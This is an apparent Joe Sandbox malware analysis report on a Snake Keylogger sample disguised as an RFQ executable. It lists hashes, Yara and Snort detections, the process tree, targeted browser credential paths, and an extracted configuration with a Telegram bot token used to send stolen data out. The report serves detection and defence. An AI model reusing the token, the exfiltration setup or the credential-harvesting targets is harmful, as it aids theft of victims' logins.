Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ__637456464647.exe

Overview

General Information

Sample Name:RFQ__637456464647.exe
Analysis ID:632544
MD5:b4bc907e8d48e8f09b4d9fdd8d416599
SHA1:592a814a428c8a5de3f06245996fc775e8dc987f
SHA256:7f7804a5460695dae61e378d733f0a613083e84c654ea6264a5276944b33f943
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Yara detected Credential Stealer
Uses the system / local time for branch decision (may execute only at specific dates)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • RFQ__637456464647.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\RFQ__637456464647.exe" MD5: B4BC907E8D48E8F09B4D9FDD8D416599)
    • RFQ__637456464647.exe (PID: 6400 cmdline: C:\Users\user\Desktop\RFQ__637456464647.exe MD5: B4BC907E8D48E8F09B4D9FDD8D416599)
    • chrome.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Local\Temp\chrome.exe" MD5: 7F916511A313837EFCDE9E4112A64E5B)
    • WerFault.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Token": "Null!", "Telegram ID": "5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x185d0:$x1: $%SMTPDV$
        • 0x17292:$x2: $#TheHashHere%&
        • 0x18578:$x3: %FTPDV$
        • 0x17274:$x4: $%TelegramDv$
        • 0x14ba3:$x5: KeyLoggerEventArgs
        • 0x14f39:$x5: KeyLoggerEventArgs
        • 0x185fc:$m1: | Snake Keylogger
        • 0x186a2:$m1: | Snake Keylogger
        • 0x187f6:$m1: | Snake Keylogger
        • 0x1891c:$m1: | Snake Keylogger
        • 0x18a76:$m1: | Snake Keylogger
        • 0x1859c:$m2: Clipboard Logs ID
        • 0x187ac:$m2: Screenshot Logs ID
        • 0x188c0:$m2: keystroke Logs ID
        • 0x18aac:$m3: SnakePW
        • 0x18784:$m4: \SnakeKeylogger\
        00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 57 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.0.RFQ__637456464647.exe.400000.6.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1b0d0:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x1a2b9:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x1a700:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1b881:$a5: \Kometa\User Data\Default\Login Data
          1.0.RFQ__637456464647.exe.400000.6.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            1.0.RFQ__637456464647.exe.400000.6.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              1.0.RFQ__637456464647.exe.400000.6.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                1.0.RFQ__637456464647.exe.400000.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 109 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.3132.226.8.16949740802842536 05/23/22-19:00:12.710166
                  SID:2842536
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "Null!", "Telegram ID": "5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc"}
                  Multi AV Scanner detection for submitted file
                  Source: RFQ__637456464647.exeReversingLabs: Detection: 46%
                  Machine Learning detection for sample
                  Source: RFQ__637456464647.exeJoe Sandbox ML: detected
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: RFQ__637456464647.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: RFQ__637456464647.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: System.Windows.Forms.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: k,C:\Windows\System.pdb source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Windows.Forms.pdbxT source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: 7.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: .pdb, source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdbP>Q source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB6 source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: chrome.exe.pdb source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr
                  Source: Binary string: System.Core.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 054D0741h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 054D02E9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 054D0B99h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648E0A9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 064848D1h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06485181h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648E981h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06488149h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 064889F9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06485A31h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648F231h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06483771h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06486739h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06486FE9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06484021h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06487899h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06487CF1h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 064885A1h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06484D29h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648E529h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 064855D9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648EDD9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06485E89h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648F689h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06483319h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 064862E1h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 0648FAE1h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06486B91h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06483BC9h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06484479h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then jmp 06487441h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.3:49740 -> 132.226.8.169:80
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewASN Name: UTMEMUS UTMEMUS
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: RFQ__637456464647.exe, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org4Jk
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: chrome.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RFQ__637456464647.exeString found in binary or memory: http://sawebservice.red-gate.com/
                  Source: RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RFQ__637456464647.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/
                  Source: RFQ__637456464647.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2
                  Source: RFQ__637456464647.exeString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/
                  Source: RFQ__637456464647.exeString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.drString found in binary or memory: https://crashpad.chromium.org/
                  Source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.drString found in binary or memory: https://crashpad.chromium.org/bug/new
                  Source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                  Source: RFQ__637456464647.exeString found in binary or memory: https://dsssdsa.fa
                  Source: RFQ__637456464647.exeString found in binary or memory: https://dsssdsa.fa)Uri
                  Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: RFQ__637456464647.exe, 00000000.00000002.316474597.000000000174A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
